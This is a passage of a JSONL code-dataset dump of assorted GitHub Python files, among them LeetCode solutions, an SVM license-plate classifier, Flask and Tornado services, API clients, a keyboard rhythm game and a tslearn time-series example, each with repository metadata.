ChildFastModule._getattribute1)\n self.assertEqual(2, module.foo)\n def 
testGetattrCallback(self):\n module = ChildFastModule(\"test\")\n FastModuleType.set_getattribute_callback(module,\n ChildFastModule._getattribute2)\n FastModuleType.set_getattr_callback(module, ChildFastModule._getattr)\n self.assertEqual(3, module.foo)\n def testFastdictApis(self):\n module = ChildFastModule(\"test\")\n self.assertFalse(module._fastdict_key_in(\"bar\"))\n with self.assertRaisesRegex(KeyError, \"module has no attribute 'bar'\"):\n module._fastdict_get(\"bar\")\n module._fastdict_insert(\"bar\", 1)\n self.assertTrue(module._fastdict_key_in(\"bar\"))\n self.assertEqual(1, module.bar)\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/fast_module_type_test.py.transformed.py","file_name":"fast_module_type_test.py.transformed.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43715010252","text":"class Solution:\n def findReplaceString(self, s: str, indices: List[int], sources: List[str], targets: List[str]) -> str:\n s = list(s)\n\n def replace(i):\n index = indices[i]\n source = sources[i]\n target = targets[i]\n\n for j, letter in enumerate(source):\n if index+j >= len(s) or s[index+j] != letter:\n return\n\n s[index] = target\n for j in range(index+1, index+len(source)):\n s[j] = ''\n\n for i in range(len(indices)):\n replace(i)\n\n return ''.join(s)\n","repo_name":"kevinlondon/leetcode","sub_path":"0000-0999/833_find_and_replace_string.py","file_name":"833_find_and_replace_string.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31510913345","text":"import os\nimport time\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn.svm as svm\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n\nstart = time.process_time()\nres = 16\ntest_frac = 0.4\n\n\ndef resize_and_scale(img, size, scale):\n img = cv2.resize(img, size)\n return 1 - np.array(img, \"float32\") / scale\n\n\ndef process_data():\n path_to_data = \"./persian_LPR/\"\n folder_list = os.listdir(path_to_data)\n sz = (res, res)\n data = []\n data_label = []\n count = 0\n for folder in folder_list:\n path = os.path.join(path_to_data + folder + \"/\")\n img_list = os.listdir(path)\n for name in img_list:\n img = cv2.imread(path + name)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = resize_and_scale(img, sz, 255)\n data.append(img.flatten())\n label = folder\n if folder == \"W\":\n label = \"ص\"\n if folder == \"S\":\n label = \"س\"\n data_label.append(label)\n count += 1\n\n data = np.array(data)\n data_label = np.array(data_label)\n\n return data, data_label, count\n\n\ndef unflatten(flattened):\n img = [[0 for x in range(res)] for y in range(res)]\n count = 0\n for i in range(res):\n for j in range(res):\n img[i][j] = 255 - flattened[count] * 255\n count += 1\n img = np.array(img)\n return img\n\n\ndef main():\n data, data_labels, data_size = process_data()\n\n x_train, x_test, x_train_labels, x_test_correct_labels = train_test_split(data, data_labels, test_size=test_frac,\n random_state=42, shuffle=True)\n\n print(\"Data size:\", data_size)\n test_size = int(test_frac * data_size)\n\n print(\"Data fetched successfully!\")\n clf = svm.SVC(C=1000, kernel='rbf', degree=3, gamma='scale', coef0=0.0, shrinking=False, probability=False,\n 
tol=0.001, cache_size=200, class_weight=None, verbose=False, max_iter=-1,\n decision_function_shape='ovr', random_state=None)\n\n clf.fit(x_train, x_train_labels)\n\n predictions = clf.predict(x_test)\n\n print(\"Training set score:\", clf.score(x_train, x_train_labels))\n count = 0\n for i in range(test_size):\n if predictions[i] == x_test_correct_labels[i]:\n count += 1\n else:\n imgplot = plt.imshow(unflatten(x_test[i]), cmap=\"Greys\")\n plt.title((\"Prediction:\", predictions[i], \" Correct Label: \", x_test_correct_labels[i]))\n plt.show()\n print(\"Test accuracy: \", count / test_size)\n print(\"Wrong predictions: \", test_size - count, \"out of\", test_size)\n print(\"Correct predictions: \", count, \"out of\", test_size)\n\n\nmain()\nprint(\"Time elapsed: \", time.process_time() - start, \"seconds\")\n\n'''cv = GridSearchCV(estimator=svm.SVC(),\n param_grid={'C': [10, 100, 1000], 'kernel': ('linear', 'rbf', 'sigmoid', 'poly',),\n 'decision_function_shape': ('ovr', 'ovo'), 'gamma': ('scale', 'auto'),\n 'shrinking': (False, True), 'tol': [0.001, 0.0001], 'probability': [False, True]})\n cv.fit(x_train, x_train_labels)\n clf = cv.best_estimator_\n print(\"Parameters of best estimator:\", cv.best_params_)'''\n","repo_name":"tarlaun/AI_Project","sub_path":"persian_LPR_SVM.py","file_name":"persian_LPR_SVM.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"15689237005","text":"N = int(input())\n#первое число, чтобы после считать только факториалы\nsumm = 1\n#чтобы посчитать факториал, т.к. там умножение\nfactor = 1\n#1, N+1 для того чтобы начиналась с единицы и выполнилось N раз\nfor i in range(1, N+1):\n #факториал\n factor *= i\n num = 1/factor\n #складываем дроби\n summ += num\nprint(summ)\n\n\n\n","repo_name":"TeleginSergey/HW2_python","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10077049658","text":"# encoding=utf8\n\n'''\n剑指 Offer II 069. 山峰数组的顶部\n符合下列属性的数组 arr 称为 山峰数组(山脉数组) :\n\narr.length >= 3\n存在 i(0 < i < arr.length - 1)使得:\narr[0] < arr[1] < ... arr[i-1] < arr[i]\narr[i] > arr[i+1] > ... > arr[arr.length - 1]\n给定由整数组成的山峰数组 arr ,返回任何满足 arr[0] < arr[1] < ... arr[i - 1] < arr[i] > arr[i + 1] > ... 
> arr[arr.length - 1] 的下标 i ,即山峰顶部。\n\n \n\n示例 1:\n\n输入:arr = [0,1,0]\n输出:1\n示例 2:\n\n输入:arr = [1,3,5,4,2]\n输出:2\n示例 3:\n\n输入:arr = [0,10,5,2]\n输出:1\n示例 4:\n\n输入:arr = [3,4,5,1]\n输出:2\n示例 5:\n\n输入:arr = [24,69,100,99,79,78,67,36,26,19]\n输出:2\n \n\n提示:\n\n3 <= arr.length <= 104\n0 <= arr[i] <= 106\n题目数据保证 arr 是一个山脉数组\n \n\n进阶:很容易想到时间复杂度 O(n) 的解决方案,你可以设计一个 O(log(n)) 的解决方案吗?\n\n \n\n注意:本题与主站 852 题相同:https://leetcode-cn.com/problems/peak-index-in-a-mountain-array/\n\n\n'''\n\n\nclass Solution(object):\n def peakIndexInMountainArray(self, arr):\n \"\"\"\n :type arr: List[int]\n :rtype: int\n \"\"\"\n n = len(arr)\n ans = -1\n\n for i in range(1, n - 1):\n if arr[i] > arr[i + 1]:\n ans = i\n break\n \n return ans\n\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/binary_search/leetcode-peakIndexInMountainArray.py","file_name":"leetcode-peakIndexInMountainArray.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33220628835","text":"from utils.ex_class import is_bodyweight_ex\nfrom utils.methods import dbopen\n\ndb_irina = 'Irina_Diary_db.sqlite3' ### ----->>> HIER DATENBANKPFAD EINGEBEN\ndb_eugen = 'Diary_db.sqlite3' ### ----->>> HIER DATENBANKPFAD EINGEBEN\ndb_test = 'Diary_dbcopy.sqlite3' ### ----->>> HIER DATENBANKPFAD EINGEBEN\n\ndef choose_db():\n possible_options = ['i','e','t']\n selected = ''\n while selected not in possible_options:\n selected = input('Welche Datenbank laden? Eugen(e), Irina(i) oder Test(t) ===> ')\n if selected == 'i':\n return db_irina\n elif selected == 'e':\n return db_eugen\n else:\n return db_test\n\n\n\n\n\ndef max_volume(exercise: int, path: str, lst_all: list): # sql quere in for-schleife\n bodyweight = 0\n if is_bodyweight_ex(exercise,lst_all) == 'yes':\n bodyweight = 80\n max_volume = 0\n best_workout = 0\n with dbopen(path) as c:\n for work_id in c.execute(''' SELECT DISTINCT workout_id\n FROM sets\n WHERE exercise_id = ?\n ''',(exercise,)):\n #print (work_id[0])\n sum = 0\n with dbopen(path) as cu:\n for set in cu.execute('''SELECT weight_kg,repetition\n FROM sets\n WHERE workout_id = ? 
AND exercise_id = ?\n ''',(work_id[0],exercise)):\n #print (set)\n sum += (set[0]+bodyweight)*set[1]\n #print (sum)\n if sum > max_volume:\n max_volume = sum\n best_workout = work_id[0]\n return best_workout\n \n\n","repo_name":"fatsamy/fatsamy","sub_path":"utils/sql_quere.py","file_name":"sql_quere.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37002898042","text":"import json\n\nimport requests\nfrom discord.ext import commands\n\n\nclass RandomSentences:\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"zio_random\")\n async def zio_rand_sentence(self):\n r = requests.get('http://www.bestemmie.org/api/bestemmie/random')\n bestemmia = json.loads(r.text)[0]\n await self.bot.say(bestemmia.get(\"bestemmia_low\"))\n\n @commands.command(name=\"zio_default\")\n async def zio_default_sentence(self):\n await self.bot.say(\"mannaggialamadonna amici!!\")\n\n @commands.command(name=\"babbo_default\")\n async def babbo_default_sentence(self):\n await self.bot.say(\"Devo cagare!\")\n\n\ndef setup(bot):\n bot.add_cog(RandomSentences(bot))\n","repo_name":"peterpalace/pagliachatbot","sub_path":"bot/cogs/pagliacci_random_sentences.py","file_name":"pagliacci_random_sentences.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30929491361","text":"# -*- coding: utf-8 -*-\n\nfrom server import *\nfrom tornado.testing import AsyncHTTPTestCase\nimport tornado.web\nimport unittest\nimport websocket\nimport json\n\n\nclass CAAControlServerTest(AsyncHTTPTestCase):\n\n def get_app(self):\n \"\"\"@Override\"\"\"\n ClientContainer.instance().set_num_max(3)\n\n return tornado.web.Application([\n (r\"/robo/register\", RobotRegisterHandler),\n (r\"/robo/delete\", RobotDeleteHandler),\n (r\"/robo/([0-9]+)\", RobotSocketHandler),\n (r\"/user/register\", UserRegisterHandler),\n (r\"/user/delete\", UserDeleteHandler),\n (r\"/user/([0-9]+)/([0-9a-zA-Z]+)\", UserSocketHandler),\n (r\"/clients\", ClientsHandler)\n ])\n\n def tearDown(self):\n \"\"\"@Override\"\"\"\n ClientContainer._instance = ClientContainer()\n\n def test_register(self):\n response0 = json.loads(self.fetch(r\"/robo/register?index=1024\").body)\n self.assertTrue(response0['success'])\n self.assertEqual(response0['index'], '1024')\n\n response1 = json.loads(\n self.fetch(r\"/user/register?index=1024&passphrase=hogehoge\").body)\n self.assertTrue(response1['success'])\n\n def test_delete(self):\n response0 = json.loads(self.fetch(r\"/robo/register?index=1024\").body)\n self.assertTrue(response0['success'])\n self.assertEqual(response0['index'], '1024')\n\n response1 = json.loads(\n self.fetch(r\"/user/register?index=1024&passphrase=hogehoge\").body)\n self.assertTrue(response1['success'])\n\n response2 = json.loads(self.fetch(r\"/user/delete?index=1024\").body)\n self.assertTrue(response2['success'])\n\n response3 = json.loads(self.fetch(r\"/robo/delete?index=1024\").body)\n self.assertTrue(response3['success'])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"caa-project/caa-central","sub_path":"control-server/server_test.py","file_name":"server_test.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71342050613","text":"import statsmodels.api as sm\nimport wooldridge\nimport matplotlib.pyplot as plt\nimport 
seaborn as sb\nimport numpy as np\n\n# c1\ndf = wooldridge.dataWoo('WAGE1')\nmodel = sm.formula.ols(formula='wage ~ educ + exper + tenure', data=df).fit()\nX = df[['educ', 'exper', 'tenure']]\nres1 = df['wage'] - model.predict(X)\n\nmodel = sm.formula.ols(formula='np.log(wage) ~ educ + exper + tenure', data=df).fit()\nres2 = np.log(df['wage']) - model.predict(X)\n\nfig, axes = plt.subplots(2, 1)\nsb.distplot(res1, kde=False, ax=axes[0])\nsb.distplot(res2, kde=False, ax=axes[1])\n\n# c3\ndf = wooldridge.dataWoo('BWGHT').dropna()\nmodel = sm.formula.ols(formula='bwght ~ cigs + parity + faminc', data=df).fit()\nres = model.resid\nX = df[['cigs', 'parity', 'faminc', 'motheduc', 'fatheduc']]\nmodel = sm.OLS(res, X).fit()\nR2 = model.rsquared\nLM = len(df) * R2\n","repo_name":"dy0703/pycharm","sub_path":"Data Analysis/Econometric/Chap_5(Multiple regression analysis OLS asymptotics).py","file_name":"Chap_5(Multiple regression analysis OLS asymptotics).py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35302885200","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 16 10:07:24 2020\r\n\r\n@author: Razer Blade\r\n\"\"\"\r\n\r\ndef book2hist(textfile,n):\r\n import string\r\n import matplotlib.pyplot as plt\r\n import numpy as np\r\n\r\n count_words=dict()\r\n text= open(textfile)\r\n text = text.read().lower().translate(str.maketrans('', '', string.punctuation))\r\n text_list = text.split()\r\n text_set = set(text_list)\r\n for i in text_set:\r\n count_words[i] = text_list.count(i)\r\n\r\n sorted_dict = sorted(count_words.items(), key=lambda x: x[1], reverse=True)\r\n sorted2 = sorted_dict[:n]\r\n\r\n word = []\r\n value = []\r\n for i in sorted2 :\r\n a,b = i\r\n word.append(a)\r\n value.append(b)\r\n \r\n y= np.arange(len(word))\r\n plt.style.use('ggplot')\r\n plt.xticks(y,word)\r\n plt.title(\"Zipf's Law\")\r\n plt.xlabel(\"Words\")\r\n plt.ylabel(\"Count\")\r\n plt.bar(y,value,edgecolor=\"black\")\r\n ","repo_name":"Reda-Zerrari/Python-projects","sub_path":"book2hist.py","file_name":"book2hist.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33854078023","text":"from datetime import datetime\nfrom flask_restful import Resource, reqparse\n# from flask_jwt import jwt_required\n\nfrom models.section import SectionModel\n\n# Inheritance of Resource class\nclass Section(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('chapter_id',\n type=int,\n required=True,\n help=\"Every section needs a chapter id.\"\n ) \n parser.add_argument('section_name',\n type=str,\n required=False,\n help=\"Every section needs a name.\"\n )\n parser.add_argument('section_description',\n type=str,\n required=False,\n help=\"Every section needs a description.\"\n )\n parser.add_argument('section_order',\n type=int,\n required=False,\n help=\"Every section needs an order.\"\n )\n \n def get(self, section_id):\n section = SectionModel.find_by_id(section_id)\n if section:\n return section.json()\n return {'message': 'Section not found'}, 404\n\n def post(self): \n data = Section.parser.parse_args()\n section = SectionModel(**data)\n\n try:\n section.save_to_db()\n except:\n return {\"message\": \"An error occurred inserting the item.\"}, 500\n\n return section.json(), 201\n\n def put(self, section_id):\n data = Section.parser.parse_args()\n\n section = 
SectionModel.find_by_id(section_id)\n\n if section is None:\n section = SectionModel(**data)\n else:\n section.chapter_id = data['chapter_id']\n section.section_name = data['section_name']\n section.section_description = data['section_description']\n section.section_order = data['section_order']\n section.section_update = datetime.now()\n\n section.save_to_db()\n\n return section.json() \n\n def delete(self, section_id):\n section = SectionModel.find_by_id(section_id)\n if section:\n section.delete_from_db()\n\n return {'message': 'Section deleted'} \n\nclass SectionList(Resource):\n def get(self): \n return {'sections': [section.json() for section in SectionModel.query.all()]}\n\n # Delete all sections will not delete child items\n def delete(self):\n SectionModel.delete_all() \n return {'message': 'All sections deleted'}","repo_name":"bkwok123/cohort4-Team-Ebook","sub_path":"python/resources/section.py","file_name":"section.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12898050147","text":"import logging\nfrom typing import Any, Dict, List, Union\n\nimport requests\n\nfrom bot.exceptions import BarreneroRequestException\n\nlogger = logging.getLogger(__name__)\n\n\nclass Barrenero:\n timeout = (3, 30)\n\n @staticmethod\n def _get(base_url: str, path: str, token: str) -> Union[List[Any], Dict[str, Any]]:\n try:\n url = base_url + path\n headers = {'Authorization': f'Token {token}'}\n\n with requests.get(url=url, headers=headers, timeout=Barrenero.timeout) as response:\n response.raise_for_status()\n result = response.json()\n except requests.RequestException as e:\n raise BarreneroRequestException('Cannot request Barrenero API') from e\n\n return result\n\n @staticmethod\n def _post(base_url: str, path: str, token: str, data: Dict[str, Any]) -> Dict[str, Any]:\n try:\n url = base_url + path\n headers = {'Authorization': f'Token {token}'}\n\n with requests.post(url=url, headers=headers, data=data, timeout=Barrenero.timeout) as response:\n response.raise_for_status()\n result = response.json()\n except requests.RequestException as e:\n raise BarreneroRequestException('Cannot request Barrenero API') from e\n\n return result\n\n @staticmethod\n def get_token_or_register(url: str, username: str, password: str, account: str=None, api_password: str=None) \\\n -> Dict[str, Any]:\n try:\n # Try to register user\n register_url = f'{url}/api/v1/auth/register/'\n data = {'username': username, 'password': password, 'account': account, 'api_password': api_password}\n with requests.post(url=register_url, data=data, timeout=Barrenero.timeout) as response_register:\n # If user is registered, try to get token using username and password\n if response_register.status_code == 409:\n login_url = f'{url}/api/v1/auth/user/'\n data = {'username': username, 'password': password}\n\n with requests.post(url=login_url, data=data, timeout=Barrenero.timeout) as response_user:\n response_user.raise_for_status()\n payload = response_user.json()\n else:\n response_register.raise_for_status()\n payload = response_register.json()\n except requests.RequestException as e:\n raise BarreneroRequestException('Cannot request Barrenero API') from e\n else:\n config = {\n 'token': payload['token'],\n 'superuser': payload['is_api_superuser'],\n }\n\n return config\n\n @staticmethod\n def miner(url: str, token: str) -> Dict[str, Any]:\n return Barrenero._get(base_url=url, path='/api/v1/status/', token=token)\n\n 
@staticmethod\n def storj(url: str, token: str) -> List[Dict[str, Any]]:\n return Barrenero._get(base_url=url, path='/api/v1/storj/', token=token)\n\n @staticmethod\n def wallet(url: str, token: str) -> Dict[str, Any]:\n return Barrenero._get(base_url=url, path='/api/v1/wallet/', token=token)\n\n @staticmethod\n def restart(url: str, token: str, service: str) -> Dict[str, Any]:\n return Barrenero._post(base_url=url, path='/api/v1/restart/', token=token, data={'name': service})\n\n @staticmethod\n def ether(url: str, token: str) -> Dict[str, Any]:\n return Barrenero._get(base_url=url, path='/api/v1/ether/', token=token)\n","repo_name":"perdy/barrenero-telegram","sub_path":"bot/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73098991091","text":"from __future__ import print_function\nimport logging\nimport grpc\nimport calculator_pb2\nimport calculator_pb2_grpc\n\n# Settings\nADDRESS_SERVER_MASTER = 'localhost:50051'\n\n\ndef run():\n stop = False\n while not stop:\n usr_in = input(\"Do a calculation? [y/n]\\n\")\n if usr_in.lower() == 'n' or usr_in.lower() == 'no':\n stop = True\n else:\n usr_in = input(\"Please enter term to calculate!\\n\")\n\n with grpc.insecure_channel(ADDRESS_SERVER_MASTER) as channel:\n stub = calculator_pb2_grpc.CalculatorStub(channel)\n response = stub.Calculate(calculator_pb2.CalculationRequest(expression=usr_in))\n\n if response.status == calculator_pb2.CalculationResponse.SUCCESS:\n print(\"The result is : \" + str(response.result) + '\\n')\n elif response.status == calculator_pb2.CalculationResponse.ZERO_DIVISION_ERROR:\n print(\"Error: Divide by zero in expression\")\n else:\n print(\"Invalid format of expression\")\n\n\nif __name__ == '__main__':\n logging.basicConfig()\n run()\n","repo_name":"HaidStefan/distributed_app","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14170027402","text":"from typing import Any, Dict, List\nfrom types import SimpleNamespace\nimport numpy\nfrom pynput import keyboard\n\nfrom common import *\nfrom keys import *\nimport sounds\n# import matplotlib.pyplot as plotlib\n\n\n# a key is represented by the corresponding led id.\nkey_to_pos = {k.led_id: k.center for k in specs}\nrender_keys = [\n CLK_GraveAccentAndTilde, CLK_1, CLK_2, CLK_3, CLK_4, CLK_5, CLK_6, CLK_7, CLK_8, CLK_9, CLK_0, CLK_MinusAndUnderscore,CLK_EqualsAndPlus, CLK_Backspace, CLK_NumLock, CLK_KeypadSlash, CLK_KeypadAsterisk,\n CLK_Tab, CLK_Q, CLK_W, CLK_E, CLK_R, CLK_T, CLK_Y, CLK_U, CLK_I, CLK_O, CLK_P, CLK_BracketLeft, CLK_BracketRight, CLK_Keypad7, CLK_Keypad8, CLK_Keypad9, CLK_Backslash,\n CLK_CapsLock, CLK_A, CLK_S, CLK_D, CLK_F, CLK_G, CLK_H, CLK_J, CLK_K, CLK_L, CLK_SemicolonAndColon, CLK_ApostropheAndDoubleQuote, CLK_Enter, CLK_Keypad4, CLK_Keypad5, CLK_Keypad6,\n CLK_LeftShift, CLK_Z, CLK_X, CLK_C, CLK_V, CLK_B, CLK_N, CLK_M, CLK_CommaAndLessThan, CLK_PeriodAndBiggerThan, CLK_SlashAndQuestionMark, CLK_RightShift, CLK_Keypad1, CLK_Keypad2, CLK_Keypad3\n]\nnon_render_keys = [k for k in onboard if k not in render_keys]\n\n\ndef binary_lit(num, keys):\n lit = []\n for k in keys:\n if num % 2 != 0:\n lit.append(k)\n num //= 2\n return lit\n\n\nclass Note:\n def __init__(self, key: int, t: float, color):\n self.j = 0\n self.key = key\n self.t = t\n self.color = 
numpy.array(color)\n\n\ndef judge(t: float, down_key: int, notes: List[Note]):\n # notes should be sorted according to t.\n judges = SimpleNamespace(perfect=0.06, good=0.11)\n for note in notes:\n if note.j:\n continue\n if note.key == down_key and abs(note.t - t) < 1:\n print(t - note.t)\n if abs(note.t - t) < judges.perfect:\n return note, 2\n elif abs(note.t - t) < judges.good:\n return note, 1\n return None, 0\n\n\ndef play_render(t: float, notes: List[Note]):\n # working_area = (0, 0, 300, 200)\n lookahead = 1.0\n note_box_size = 26.0\n note_velocity = 240.0\n \n colors = color_ids(onboard, 0, 0, 0)\n jcolor = burst_color if burst_color is not rainbow_color else perfect_result\n colors = blend(colors, color_ids(non_render_keys, *jcolor), alpha_blend(1.0))\n for note in notes:\n if abs(note.t - t) > lookahead:\n continue\n if note.j:\n continue\n note_pos_1 = key_to_pos[note.key] + note_velocity * (note.t - t)\n note_pos_2 = key_to_pos[note.key] - note_velocity * (note.t - t)\n for note_pos in [note_pos_1, note_pos_2]:\n for key in render_keys:\n if abs(key_to_pos[key].imag - note_pos.imag) > 6:\n continue\n dist = abs(note_pos - key_to_pos[key])\n if dist < note_box_size:\n a = 1 - dist / note_box_size\n rgb = note.color * a\n colors = blend(colors, color_ids([key], *rgb))\n colors = blend(colors, color_ids([note.key], *perfect_result))\n render(colors)\n\n\nburst_time = -1\nmiss_color = numpy.array([255, 64, 0])\ngood_color = numpy.array([32, 255, 64])\nrainbow_color = \"rainbow\"\nperfect_color = rainbow_color\nperfect_result = numpy.array([255, 255, 255])\nburst_color = perfect_color\n\n\nasync def oem_burst():\n try:\n oem = [spec for spec in specs if spec.led_id not in onboard]\n while burst_time > -100:\n t = time.perf_counter()\n dur = 0.6\n a = max(0, dur - (t - burst_time)) / dur\n if burst_color is not rainbow_color:\n render(color_specs(oem, *(burst_color * a)))\n else:\n phases = numpy.angle([k.center - (165 + 120j) for k in oem]) + t\n colors = []\n for k, phase in zip(oem, phases):\n colors += color_specs([k], *chsv(phase, 0.8, a))\n render(colors)\n await asyncio.sleep(0.008)\n except Exception:\n import traceback; traceback.print_exc()\n\n\nasync def results(chart: List[Note], duration: float):\n c = [2] * len(onboard)\n up = lambda i, v: c.__setitem__(i, min(c[i], v))\n for note in chart:\n up(min(len(c) - 1, int(note.t / duration * len(c))), note.j)\n c = [[miss_color, good_color, perfect_result, miss_color][v] for v in c]\n base = pure(255, 160, 224)\n sounds.applause.play()\n for i in range(len(c) + 1):\n async with Frame(0.008):\n colors = c[:i] + [[0, 0, 0]] * (len(c) - i)\n colors = [color_ids([k], *v)[0] for k, v in zip(onboard, colors)]\n render(blend(base, colors, alpha_blend(1.0)))\n\n\nasync def fade_pause_loop(delta):\n await asyncio.sleep(delta)\n sounds.pausing.fadeout(500)\n\n\nasync def play(music: str, chart: List[Note], keymap: Dict[Any, int]):\n global burst_color, burst_time\n\n def on_press(key):\n nonlocal seeya\n if seeya == False and key == keyboard.Key.esc:\n seeya = True\n return False\n try:\n if key.vk in keymap:\n press_queue.append((keymap[key.vk], time.perf_counter() - 0.02))\n except AttributeError:\n if key in keymap:\n press_queue.append((keymap[key], time.perf_counter() - 0.02))\n\n seeya = None\n press_queue = []\n sounds.mixer.music.load(music)\n await asyncio.sleep(0.5)\n fade_t = asyncio.create_task(fade_pause_loop(1.8))\n sounds.mixer.music.play()\n listener = keyboard.Listener(on_press=on_press)\n listener.start()\n burst_t = 
asyncio.create_task(oem_burst())\n reset_time = 0.0\n start_time = time.perf_counter()\n while sounds.mixer.music.get_busy():\n await asyncio.sleep(0)\n t = sounds.mixer.music.get_pos() / 1000.0\n if press_queue:\n for k, pt in press_queue:\n note, j = judge(t - time.perf_counter() + pt, k, chart)\n if j:\n note.j = j\n burst_time = time.perf_counter()\n if j == 2:\n if time.perf_counter() >= reset_time:\n burst_color = perfect_color\n if j == 1:\n reset_time = time.perf_counter() + 0.4\n burst_color = good_color\n press_queue.clear()\n for note in chart:\n if t > note.t + 0.09 and not note.j:\n note.j = -1\n burst_time = time.perf_counter()\n reset_time = time.perf_counter() + 0.5\n burst_color = miss_color\n play_render(t, chart)\n duration = time.perf_counter() - start_time\n for i in range(0, 255, 2):\n async with Frame(0.005):\n render(pure(255 - i, 255 - i, 255 - i))\n await asyncio.sleep(1.0)\n burst_time = -128\n await fade_t\n await burst_t\n seeya = False\n await results(chart, duration)\n while not seeya:\n await asyncio.sleep(0.02)\n sounds.seeya.play()\n await asyncio.sleep(3.5)\n","repo_name":"eliphatfs/kbdmania","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"39950753202","text":"import sys\n\nin_file = sys.argv[1] if len(sys.argv) > 1 else \"input\"\nwith open(in_file, 'r') as f:\n data = f.read().splitlines()\n \nshape_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3,\n}\n\nwin_score = {\n \"A\": {\"X\": 3, \"Y\": 6, \"Z\": 0},\n \"B\": {\"X\": 0, \"Y\": 3, \"Z\": 6},\n \"C\": {\"X\": 6, \"Y\": 0, \"Z\": 3},\n} \n\nscore = 0\nfor l in data:\n x, y = l.split(\" \")\n score += shape_score[y]\n score += win_score[x][y]\nprint(score)\n\n\nwin_score = {\n \"X\": 0,\n \"Y\": 3,\n \"Z\": 6,\n}\n\nshape_score = {\n \"A\": {\"X\": 3, \"Y\": 1, \"Z\": 2},\n \"B\": {\"X\": 1, \"Y\": 2, \"Z\": 3},\n \"C\": {\"X\": 2, \"Y\": 3, \"Z\": 1},\n}\n\nscore = 0\nfor l in data:\n x, y = l.split(\" \")\n score += shape_score[x][y]\n score += win_score[y]\nprint(score)","repo_name":"theevann/advent-of-code","sub_path":"2022/day_2/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9117419055","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPAA and SAX features\n====================\n\nThis example presents a comparison between PAA, SAX and 1d-SAX features.\n\"\"\"\n\n# Author: Romain Tavenard\n# License: BSD 3 clause\n\nimport numpy\nimport matplotlib.pyplot as plt\n\nfrom tslearn.generators import random_walks\nfrom tslearn.preprocessing import TimeSeriesScalerMeanVariance\nfrom tslearn.piecewise import PiecewiseAggregateApproximation\nfrom tslearn.piecewise import SymbolicAggregateApproximation, OneD_SymbolicAggregateApproximation\n\nnumpy.random.seed(0)\n# Generate a random walk time series\nn_ts, sz, d = 1, 100, 1\ndataset = random_walks(n_ts=n_ts, sz=sz, d=d)\nscaler = TimeSeriesScalerMeanVariance(mu=0., std=1.) 
# Rescale time series\ndataset = scaler.fit_transform(dataset)\n\n# PAA transform (and inverse transform) of the data\nn_paa_segments = 10\npaa = PiecewiseAggregateApproximation(n_segments=n_paa_segments)\npaa_dataset_inv = paa.inverse_transform(paa.fit_transform(dataset))\n\n# SAX transform\nn_sax_symbols = 8\nsax = SymbolicAggregateApproximation(n_segments=n_paa_segments, alphabet_size_avg=n_sax_symbols)\nsax_dataset_inv = sax.inverse_transform(sax.fit_transform(dataset))\n\n# 1d-SAX transform\nn_sax_symbols_avg = 8\nn_sax_symbols_slope = 8\none_d_sax = OneD_SymbolicAggregateApproximation(n_segments=n_paa_segments, alphabet_size_avg=n_sax_symbols_avg,\n alphabet_size_slope=n_sax_symbols_slope)\none_d_sax_dataset_inv = one_d_sax.inverse_transform(one_d_sax.fit_transform(dataset))\n\nplt.figure()\nplt.subplot(2, 2, 1) # First, raw time series\nplt.plot(dataset[0].ravel(), \"b-\")\nplt.title(\"Raw time series\")\n\nplt.subplot(2, 2, 2) # Second, PAA\nplt.plot(dataset[0].ravel(), \"b-\", alpha=0.4)\nplt.plot(paa_dataset_inv[0].ravel(), \"b-\")\nplt.title(\"PAA\")\n\nplt.subplot(2, 2, 3) # Then SAX\nplt.plot(dataset[0].ravel(), \"b-\", 